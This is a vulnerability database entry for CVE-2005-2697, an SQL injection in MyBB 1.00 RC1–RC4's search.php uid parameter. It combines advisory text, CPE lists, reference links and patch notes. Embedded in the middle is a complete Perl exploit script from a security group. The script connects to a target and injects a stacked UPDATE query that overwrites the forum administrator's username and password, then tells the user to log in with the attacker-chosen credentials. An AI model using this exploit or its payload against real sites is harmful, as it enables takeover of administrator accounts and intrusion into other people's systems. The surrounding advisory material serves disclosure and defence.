CVE-2005-2697
CVSS 7.5
Published: 2005-08-26 11:50:00
Last revised: 2016-10-17 23:29:31

[Original] SQL injection vulnerability in search.php for MyBulletinBoard (MyBB) 1.00 Release Candidate 1 through 4 allows remote attackers to execute arbitrary SQL commands via the uid parameter. NOTE: this issue might overlap CVE-2005-0282.


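[CNNVD] MyBulletinBoard 'search.php' SQL injection vulnerability (CNNVD-200508-291)

        The search.php page in MyBulletinBoard (MyBB) 1.00 Release Candidate 1 through 4 contains an SQL injection vulnerability. This allows remote attackers to execute arbitrary SQL commands via the uid parameter.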

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:mybulletinboard:mybulletinboard:1.00_rc1
cpe:/a:mybulletinboard:mybulletinboard:1.00_rc2
cpe:/a:mybulletinboard:mybulletinboard:1.00_rc3
cpe:/a:mybulletinboard:mybulletinboard:1.00_rc4

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2697
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2697
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-291
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=112448791006470&w=2
(UNKNOWN)  BUGTRAQ  20050819 Vul in MyBB
http://www.securityfocus.com/bid/14615
(UNKNOWN)  BID  14615

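- Vulnerability information

MyBulletinBoard 'search.php' SQL injection vulnerability
High risk SQL injection
2005-08-26 00:00:00 2005-10-25 00:00:00
Remote
        The search.php page in MyBulletinBoard (MyBB) 1.00 Release Candidate 1 through 4 contains an SQL injection vulnerability. This allows remote attackers to execute arbitrary SQL commands via the uid parameter.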

- Advisories and patches

        

- Vulnerability information (1172)

MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit (EDBID:1172)
php webapps
2005-08-22 Verified
0 Alpha_Programmer
# mybb is dead /str0ke

#!/usr/bin/perl
######################################################################################
#                              Crouz.Com Security Team                               #
######################################################################################
#    EXPLOIT FOR: MyBulletinBoard Search.PHP SQL Injection Vulnerability             #
#                                                                                    #
#Expl0it By: A l p h a _ P r o g r a m m e r (sirius)                                #
#Email: Alpha_Programmer@LinuxMail.ORG                                               #
#                                                                                    #
#This Xpl Change Admin's Pass For L0gin With P0wer User                              #
#                                                                                    #
#HACKERS PAL & Devil-00 & ABDUCTER are credited with the discovery of this vuln      #
#                                                                                    #
######################################################################################
# GR33tz T0 ==>  mh_p0rtal  --  Dr-CephaleX  --  The-Cephexin  -- Djay_Agoustinno    #
#               No_Face_King --  Behzad185 -- Autumn_Love6(Hey Man You Are Singular) #
#                                                                                    #
#   Special Lamerz : Hoormazd  &  imm02tal  :P  ++ xshabgardx                        #
######################################################################################

use IO::Socket;

if (@ARGV < 2)
{
  print "\n==========================================\n";
  print " \n     -- Exploit By Alpha Programmer(sirius) --\n\n";
  print "              Crouz Security Team      \n\n";
  print "         Usage: <T4rg3t> <DIR>\n\n"; 
  print "==========================================\n\n";
  print "Examples:\n\n";
  print "    Mybb.pl www.Site.com /mybb/ \n";
  exit();

}
my $host = $ARGV[0];
my $dir = $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, 
PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
print "C0nn3cted\n";
$http = "GET $dir/search.php?action=finduser&uid=-1' ; update mybb_users set username='da05581c9137f901f4fa4da5a958c273' , password='da05581c9137f901f4fa4da5a958c273' where usergroup=4 and uid=1 HTTP/1.0\n";
$http .= "Host: $host\n\n\n\n";
print "\n";
print $remote $http;
print "Wait For Changing Password ...\n";
sleep(10);
print "OK , Now Login With :\n";
print "Username: crouz\n";
print "Password: crouz\n\n";
print "Enjoy ;)\n\n";

# milw0rm.com [2005-08-22]
		

- Vulnerability information

19139
MyBulletinBoard (MyBB) search.php uid Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability description

MyBulletinBoard (MyBB) contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'search.php' script not properly sanitizing user-supplied input to the 'uid' variable. This may allow a remote attacker to inject or manipulate SQL queries in the back-end database.

- Timeline

2005-08-19 Unknown
2005-08-19 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Chris Boulton has released a patch to address this vulnerability.

- Related references

- Vulnerability author

 

 
